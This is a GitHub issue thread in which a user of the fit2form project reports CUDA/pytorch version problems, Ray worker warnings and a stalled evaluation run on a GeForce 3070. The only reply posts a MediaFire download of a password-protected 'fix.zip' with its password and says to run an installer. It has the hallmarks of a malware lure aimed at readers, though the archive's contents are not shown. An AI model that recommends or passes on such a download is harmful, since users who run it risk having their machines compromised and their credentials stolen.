### ISSUE TITLE
The system configuration of this work

### ISSUE THREAD

**Issue by lemonci** [columbia-robovision/fit2form#9]
I am using a GeForce 3070 on Ubuntu 20.04, as there is no cuda 10.1 for Ubuntu 20.04. I have to install the following version of pytorch instead of the ones listed in your yaml file:

`    package                    |            build
    ---------------------------|-----------------
    _pytorch_select-0.2        |            gpu_0           2 KB
    cudnn-7.6.5                |       cuda10.1_0       179.9 MB
    pytorch-1.4.0              |cuda101py37h02f0884_0       167.4 MB
    ------------------------------------------------------------
                                           Total:       347.4 MB

The following NEW packages will be INSTALLED:

  _pytorch_select    pkgs/main/linux-64::_pytorch_select-0.2-gpu_0 
  cudnn              pkgs/main/linux-64::cudnn-7.6.5-cuda10.1_0 
  pytorch            pkgs/main/linux-64::pytorch-1.4.0-cuda101py37h02f0884_0 
`
When trying to run `evaluate_generator.py,` I received multiple warnings like:

`-- WARNING: 63 PYTHON workers have been started. This could be a result of using a large number of actors, or it could be a consequence of using nested tasks (see https://github.com/ray-project/ray/issues/3644) for some a discussion of workarounds.`

Then tqdm progress bar doesn't move at all:
`Loaded generator network and optimizer from path:  downloads/checkpoints/fit2form.pth
<learning.finger_generator.TrainedGNFingerGenerator object at 0x7fbe0018e590>
fit2form:   0%|                                                                                                                             | 0/40 [00:00<?, ?it/s]`

And after running `nvidia-smi`:

`Wed Aug 28 05:50:01 2024       
+-----------------------------------------------------------------------------+
| NVIDIA-SMI 470.256.02   Driver Version: 470.256.02   CUDA Version: 11.4     |
|-------------------------------+----------------------+----------------------+
| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  NVIDIA GeForce ...  On   | 00000000:01:00.0  On |                  N/A |
| 30%   46C    P2    41W / 220W |   4341MiB /  7982MiB |      5%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+
                                                                               
+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|    0   N/A  N/A      1195      G   /usr/lib/xorg/Xorg                360MiB |
|    0   N/A  N/A      1715      G   /usr/bin/gnome-shell              112MiB |
|    0   N/A  N/A      3524      G   /usr/lib/firefox/firefox          627MiB |
|    0   N/A  N/A     22385      G   ...--variations-seed-version       64MiB |
|    0   N/A  N/A     58185      C   ...--name evaluation_results     3171MiB |
+-----------------------------------------------------------------------------+
`

Please suggest if you used a more powerful GPU for training (as not mentioned in the paper), or I have to run the code on Ubuntu 18 with CUDA 10 with your configurations. Thanks.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
